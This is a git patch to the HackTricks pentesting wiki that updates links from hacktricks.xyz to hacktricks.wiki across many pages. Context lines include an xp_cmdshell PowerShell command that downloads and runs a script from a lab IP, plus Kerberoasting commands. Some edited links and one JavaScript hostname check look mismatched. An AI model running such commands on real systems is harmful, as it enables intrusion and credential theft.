From 234e3d13c621c6cc27bfdeb96fc2c3baae50526d Mon Sep 17 00:00:00 2001 From: Jimmy Date: Fri, 10 Jan 2025 14:40:02 +0100 Subject: [PATCH] Update URLs --- src/SUMMARY.md | 8 ++++---- .../macos-electron-applications-injection.md | 2 +- .../113-pentesting-ident.md | 2 +- .../137-138-139-pentesting-netbios.md | 2 +- .../1521-1522-1529-pentesting-oracle-listener.md | 2 +- .../README.md | 2 +- src/network-services-pentesting/43-pentesting-whois.md | 2 +- .../5439-pentesting-redshift.md | 2 +- .../5985-5986-pentesting-winrm.md | 2 +- .../nfs-service-pentesting.md | 2 +- src/network-services-pentesting/pentesting-dns.md | 2 +- .../pentesting-ftp/README.md | 2 +- src/network-services-pentesting/pentesting-imap.md | 2 +- .../pentesting-kerberos-88/README.md | 2 +- src/network-services-pentesting/pentesting-ldap.md | 2 +- .../pentesting-mssql-microsoft-sql-server/README.md | 2 +- src/network-services-pentesting/pentesting-mysql.md | 2 +- src/network-services-pentesting/pentesting-ntp.md | 2 +- src/network-services-pentesting/pentesting-pop.md | 2 +- src/network-services-pentesting/pentesting-rdp.md | 2 +- src/network-services-pentesting/pentesting-rpcbind.md | 2 +- src/network-services-pentesting/pentesting-smb.md | 2 +- .../pentesting-smb/README.md | 2 +- .../pentesting-smtp/README.md | 2 +- .../pentesting-snmp/README.md | 2 +- src/network-services-pentesting/pentesting-telnet.md | 2 +- .../pentesting-web/README.md | 2 +- .../pentesting-web/angular.md | 2 +- .../pentesting-web/buckets/README.md | 2 +- .../pentesting-web/buckets/firebase-database.md | 2 +- src/pentesting-web/file-upload/README.md | 2 +- src/pentesting-web/oauth-to-account-takeover.md | 2 +- .../xss-cross-site-scripting/other-js-tricks.md | 2 +- src/todo/cookies-policy.md | 10 +++++----- src/welcome/hacktricks-values-and-faq.md | 2 +- .../active-directory-methodology/README.md | 4 ++-- src/windows-hardening/lateral-movement/README.md | 6 +++--- 37 files changed, 47 insertions(+), 47 deletions(-) 
diff --git a/src/SUMMARY.md b/src/SUMMARY.md index fb3efcc74..60a9a9df7 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -289,7 +289,7 @@ - [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md) - [WinRM](windows-hardening/lateral-movement/winrm.md) - [WmiExec](windows-hardening/lateral-movement/wmiexec.md) -- [Pivoting to the Cloud$$external:https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements$$]() +- [Pivoting to the Cloud$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html$$]() - [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md) - [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) - [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) @@ -692,9 +692,9 @@ # ⛈️ Cloud Security -- [Pentesting Kubernetes$$external:https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security$$]() -- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology$$]() -- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology$$]() +- [Pentesting Kubernetes$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/index.html$$]() +- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/pentesting-cloud-methodology.html$$]() +- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html$$]() # 😎 Hardware/Physical Access 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index f5c053b02..5adf076ce 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -4,7 +4,7 @@ ## Basic Information -If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). But for now just know that Electron runs **node**.\ +If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation). But for now just know that Electron runs **node**.\ And node has some **parameters** and **env variables** that can be use to **make it execute other code** apart from the indicated file. ### Electron Fuses diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md index d0050da7a..f6118efaa 100644 --- a/src/network-services-pentesting/113-pentesting-ident.md +++ b/src/network-services-pentesting/113-pentesting-ident.md 
@@ -85,7 +85,7 @@ Entry_1: Note: | The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. - https://book.hacktricks.xyz/pentesting/113-pentesting-ident + https://book.hacktricks.wiki/en/network-services-pentesting/113-pentesting-ident.html Entry_2: Name: Enum Users diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index 1d8db47da..8a1d77bf2 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -74,7 +74,7 @@ Entry_1: For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. - https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios + https://book.hacktricks.wiki/en/network-services-pentesting/137-138-139-pentesting-netbios.html Entry_2: Name: Find Names diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md index ad4088b66..be070d818 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md 
@@ -54,7 +54,7 @@ Entry_1: for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener + https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index 4731a8f51..b400ed8ba 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -54,7 +54,7 @@ Entry_1: for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener + https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/43-pentesting-whois.md b/src/network-services-pentesting/43-pentesting-whois.md index fa1b5f89d..2991bc629 100644 --- a/src/network-services-pentesting/43-pentesting-whois.md +++ b/src/network-services-pentesting/43-pentesting-whois.md @@ -46,7 +46,7 @@ Entry_1: The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - https://book.hacktricks.xyz/pentesting/pentesting-smtp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: Banner Grab 
diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 9fb89cfc1..a9e1f8cc8 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -9,7 +9,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html {{#endref}} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index 0eaad0bbd..91010de08 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -291,7 +291,7 @@ Entry_1: print(s.run_cmd('ipconfig')) print(s.run_ps('ipconfig')) - https://book.hacktricks.xyz/pentesting/pentesting-winrm + https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html Entry_2: Name: Hydra Brute Force diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 96ef5c155..37e4a718b 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -119,7 +119,7 @@ Entry_1: cd /mnt nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in - https://book.hacktricks.xyz/pentesting/nfs-service-pentesting + https://book.hacktricks.wiki/en/network-services-pentesting/nfs-service-pentesting.html Entry_2: Name: Nmap 
diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md index 3d3b06e2d..6700273f3 100644 --- a/src/network-services-pentesting/pentesting-dns.md +++ b/src/network-services-pentesting/pentesting-dns.md @@ -233,7 +233,7 @@ Entry_1: Domain_Name exit - https://book.hacktricks.xyz/pentesting/pentesting-dns + https://book.hacktricks.wiki/en/todo/pentesting-dns.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md index 365455e68..46cb1cb95 100644 --- a/src/network-services-pentesting/pentesting-ftp/README.md +++ b/src/network-services-pentesting/pentesting-ftp/README.md @@ -245,7 +245,7 @@ Entry_1: wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' if PASV transfer is disabled - https://book.hacktricks.xyz/pentesting/pentesting-ftp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-imap.md b/src/network-services-pentesting/pentesting-imap.md index 76287cbf1..1dc3e8240 100644 --- a/src/network-services-pentesting/pentesting-imap.md +++ b/src/network-services-pentesting/pentesting-imap.md 
@@ -173,7 +173,7 @@ Entry_1: Note: | The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used. - https://book.hacktricks.xyz/pentesting/pentesting-imap + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-imap.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index dbc1286da..7c6bc8467 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -49,7 +49,7 @@ Entry_1: Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. - https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html Entry_2: Name: Pre-Creds 
diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md index 001144b6a..8cc58a5db 100644 --- a/src/network-services-pentesting/pentesting-ldap.md +++ b/src/network-services-pentesting/pentesting-ldap.md @@ -396,7 +396,7 @@ Entry_1: Note: | The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. - https://book.hacktricks.xyz/pentesting/pentesting-ldap + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index a003109da..da7fdda89 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -673,7 +673,7 @@ Entry_1: xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" - https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html Entry_2: Name: Nmap for SQL diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index cc8193ae3..d7f9cd8ab 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md 
@@ -623,7 +623,7 @@ Entry_1: Note: | MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). - https://book.hacktricks.xyz/pentesting/pentesting-mysql + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index 02764d893..f0844071c 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -71,7 +71,7 @@ Entry_1: Note: | The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. - https://book.hacktricks.xyz/pentesting/pentesting-ntp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ntp.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-pop.md b/src/network-services-pentesting/pentesting-pop.md index 58d67f223..3af742556 100644 --- a/src/network-services-pentesting/pentesting-pop.md +++ b/src/network-services-pentesting/pentesting-pop.md 
@@ -98,7 +98,7 @@ Entry_1: Note: | Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version. - https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-pop.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index afb6cdded..66f2a52dd 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md @@ -136,7 +136,7 @@ Entry_1: Note: | Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. - https://book.hacktricks.xyz/pentesting/pentesting-rdp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html Entry_2: Name: Nmap diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md index cb02d5574..5ed00886e 100644 
--- a/src/network-services-pentesting/pentesting-rpcbind.md +++ b/src/network-services-pentesting/pentesting-rpcbind.md @@ -99,7 +99,7 @@ Entry_1: Note: | Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively. - https://book.hacktricks.xyz/pentesting/pentesting-rpcbind + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html Entry_2: Name: rpc info diff --git a/src/network-services-pentesting/pentesting-smb.md b/src/network-services-pentesting/pentesting-smb.md index 7656937ad..2c6bd0de1 100644 --- a/src/network-services-pentesting/pentesting-smb.md +++ b/src/network-services-pentesting/pentesting-smb.md @@ -559,7 +559,7 @@ Entry_1: GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request - https://book.hacktricks.xyz/pentesting/pentesting-smb + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html Entry_2: Name: Enum4Linux diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 0dfb197d5..4bada01ee 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md 
@@ -559,7 +559,7 @@ Entry_1: GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request - https://book.hacktricks.xyz/pentesting/pentesting-smb + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html Entry_2: Name: Enum4Linux diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 2ebf994af..76a33d55b 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -564,7 +564,7 @@ Entry_1: Note: | SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server. - https://book.hacktricks.xyz/pentesting/pentesting-smtp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 8cc41a64e..ce88852bc 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -256,7 +256,7 @@ Entry_1: Note: | SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). - https://book.hacktricks.xyz/pentesting/pentesting-snmp + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html Entry_2: Name: SNMP Check diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 82cf4831e..4bc44869f 100644 
--- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -57,7 +57,7 @@ Entry_1: wireshark to hear creds being passed tcp.port == 23 and ip.addr != myip - https://book.hacktricks.xyz/pentesting/pentesting-telnet + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html Entry_2: Name: Banner Grab diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 0feb403ae..5b49ff7ba 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -359,7 +359,7 @@ Entry_1: Name: Notes Description: Notes for Web Note: | - https://book.hacktricks.xyz/pentesting/pentesting-web + https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/index.html Entry_2: Name: Quick Web Scan diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index f1b1a7c22..85099019a 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md 
@@ -602,7 +602,7 @@ According to the W3C documentation, the `window.location` and `document.location * [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts) * [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md) * [Angular Universal](https://angular.io/guide/universal) -* [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss) +* [DOM XSS](https://book.hacktricks.wiki/en/pentesting-web/xss-cross-site-scripting/dom-xss.html) * [Angular ElementRef](https://angular.io/api/core/ElementRef) * [Angular Renderer2](https://angular.io/api/core/Renderer2) * [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/) diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 498f20fa7..9ed6844e1 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -5,7 +5,7 @@ Check this page if you want to learn more about enumerating and abusing Buckets: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum {{#endref}} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 5e7b54490..ae9df2254 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md 
+++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -9,7 +9,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html {{#endref}} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 76adc985a..0b471533a 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -89,7 +89,7 @@ Other useful extensions: ### Special extension tricks -If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\ +If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\ If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files). The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...) diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index cf7454fea..d8bb60956 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md 
@@ -158,7 +158,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum +https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html {{#endref}} ### Abusing other Apps tokens diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md index 6a4bcadb5..5e6a3d4a7 100644 --- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md +++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md @@ -170,7 +170,7 @@ document.body.append(anchor) a = document.createElement("a") log = [] for (let i = 0; i <= 0x10ffff; i++) { - a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz` + a.href = `${String.fromCodePoint(i)}https://hacktricks.wiki` if (a.hostname === "hacktricks.xyz") { log.push(i) } diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md index 427802224..5944d656d 100644 --- a/src/todo/cookies-policy.md +++ b/src/todo/cookies-policy.md @@ -6,10 +6,10 @@ Last updated: 02/04/2023 This Cookies Policy applies to the following websites owned and operated by HackTricks team ("HackTricks", "we", "us" or "our"): -* hacktricks.xyz -* [www.hacktricks.xyz](http://www.hacktricks.xyz/) -* book.hacktricks.xyz -* cloud.hacktricks.xyz +* hacktricks.wiki +* [www.hacktricks.wiki](https://www.hacktricks.wiki/) +* book.hacktricks.wiki +* cloud.hacktricks.wiki By using any of these websites, you agree to the use of cookies in accordance with this Cookies Policy. If you do not agree, please disable cookies in your browser settings or refrain from using our websites. 
@@ -26,7 +26,7 @@ We use cookies on our websites for the following purposes: 3. Functionality cookies: These cookies enable our websites to remember choices you make, such as your language or region, to provide a more personalized experience. 4. Targeting/advertising cookies: These cookies are used to deliver relevant ads and marketing communications based on your interests, browsing history, and interactions with our websites. -Moreover, the pages book.hacktricks.xyz and cloud.hacktricks.xyz are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy). +Moreover, the pages book.hacktricks.wiki and cloud.hacktricks.wiki are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy). ### Third-party cookies diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dc48dd373..dd5cea83d 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -58,7 +58,7 @@ If you need a bibtex you can use something like: author = {"HackTricks Team" or the Authors name of the specific page/trick}, title = {Title of the Specific Page}, year = {Year of Last Update (check it at the end of the page)}, - url = {\url{https://book.hacktricks.xyz/specific-page}}, + url = {\url{https://book.hacktricks.wiki/specific-page}}, } ``` diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index e016edcca..77130c545 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md 
@@ -67,7 +67,7 @@ If you just have access to an AD environment but you don't have any credentials/ - Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) - Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) - Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) -- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology): +- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html): - Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available. - If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123). - Tools: @@ -685,7 +685,7 @@ rdp-sessions-abuse.md ## AD -> Azure & Azure -> AD {{#ref}} -https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity +https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html {{#endref}} ## Some General Defenses 
